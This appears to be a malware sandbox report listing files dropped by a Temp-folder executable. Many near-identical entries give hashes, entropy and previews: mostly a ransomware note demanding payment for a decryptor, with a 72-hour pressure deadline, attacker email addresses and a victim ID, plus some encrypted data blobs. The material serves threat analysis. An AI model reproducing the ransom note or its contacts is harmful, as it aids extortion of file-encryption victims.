                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1226
                                                                                                                                              Entropy (8bit):7.839869991004214
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:4hT3rBw76sgbGsQBVSaWyEYxdzfpXy3FtZKPMK+OpeWrosS:4hHBw7oSsk4FGz43Nsl+YeIG
                                                                                                                                              MD5:FE9A5EE3FDA9222E23A379AB76A3AF8B
                                                                                                                                              SHA1:1D78D47C7C9F50BB09B3AB954369D8373627D07D
                                                                                                                                              SHA-256:236BB496144471558F8D0BE4FE87CFDBCF6068C627DB891BA9BD8EEC9D69120B
                                                                                                                                              SHA-512:01F04731B11BAFF20A1949A29EDBA71D65A0D480E7CCD6A382AEF1646AEFBF1A56DADE4E94E651BE9FDEE3A3EA2221257AC6B5C9DE56AD163F51A9BD940914F0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:#{.....M..R%[K*..|.4....F6...[6~...2~...e'0.k...6.....x.z..F.$+...s..E....t.Z}.....x....}:Z..m..n.Te2.x.2E.f......}..o-@...i"O@..M......m.T....1.kGS...x..y._..u.0...(.HbB..!............0.%..V6.D;b..n.n..q.c......v...`.z.......%u.H...=.&X..Q.....~|`.b.k.$......6....x2...vU.p.S..q.I...q.O...,9C.l..LhR.o._...\.......9...q..Y..1=..KHF..?..d.>...Ql%E..f=.VV..x.IX.U.<......B......J.R...B+Lt~.r[DP...f..E.#....A.O.a..V.Y.b+.xC.4t"^.N6.l..Z.q....Hd.\.m2.jU..X..ojI.C .7"....."b.U....=.B.....wc32m....../l....;..RUs....I..A.q#....h..2....V..J....'..hB.i/j..S.lWH..1{@Z.....=.a'.t..'......ul......q..(.~.^.B..V.m.k*.kAqI)|...Y.uX..H4i(....N....).....I....YF)j...@;'.....S...cY.6[P=.d....EH)..1. hr.N!2...s.w.....UY...04....V...x..+Y9.x...~Y.bJ.d@R....f.]K#.......(.....xM.^...{......A.a.ZP....!.5.....$=~...&..G..f.M.......Na..P<..Au*3d.0.........<..h.A5S......][?T.D.3......e..O....^.|..F.[.p.{+m..?V..ic_6...."....m..jE...U..{...H\1).t.. ....pZ.{(..K..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1226
                                                                                                                                              Entropy (8bit):7.839869991004214
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:4hT3rBw76sgbGsQBVSaWyEYxdzfpXy3FtZKPMK+OpeWrosS:4hHBw7oSsk4FGz43Nsl+YeIG
                                                                                                                                              MD5:FE9A5EE3FDA9222E23A379AB76A3AF8B
                                                                                                                                              SHA1:1D78D47C7C9F50BB09B3AB954369D8373627D07D
                                                                                                                                              SHA-256:236BB496144471558F8D0BE4FE87CFDBCF6068C627DB891BA9BD8EEC9D69120B
                                                                                                                                              SHA-512:01F04731B11BAFF20A1949A29EDBA71D65A0D480E7CCD6A382AEF1646AEFBF1A56DADE4E94E651BE9FDEE3A3EA2221257AC6B5C9DE56AD163F51A9BD940914F0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:#{.....M..R%[K*..|.4....F6...[6~...2~...e'0.k...6.....x.z..F.$+...s..E....t.Z}.....x....}:Z..m..n.Te2.x.2E.f......}..o-@...i"O@..M......m.T....1.kGS...x..y._..u.0...(.HbB..!............0.%..V6.D;b..n.n..q.c......v...`.z.......%u.H...=.&X..Q.....~|`.b.k.$......6....x2...vU.p.S..q.I...q.O...,9C.l..LhR.o._...\.......9...q..Y..1=..KHF..?..d.>...Ql%E..f=.VV..x.IX.U.<......B......J.R...B+Lt~.r[DP...f..E.#....A.O.a..V.Y.b+.xC.4t"^.N6.l..Z.q....Hd.\.m2.jU..X..ojI.C .7"....."b.U....=.B.....wc32m....../l....;..RUs....I..A.q#....h..2....V..J....'..hB.i/j..S.lWH..1{@Z.....=.a'.t..'......ul......q..(.~.^.B..V.m.k*.kAqI)|...Y.uX..H4i(....N....).....I....YF)j...@;'.....S...cY.6[P=.d....EH)..1. hr.N!2...s.w.....UY...04....V...x..+Y9.x...~Y.bJ.d@R....f.]K#.......(.....xM.^...{......A.a.ZP....!.5.....$=~...&..G..f.M.......Na..P<..Au*3d.0.........<..h.A5S......][?T.D.3......e..O....^.|..F.[.p.{+m..?V..ic_6...."....m..jE...U..{...H\1).t.. ....pZ.{(..K..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
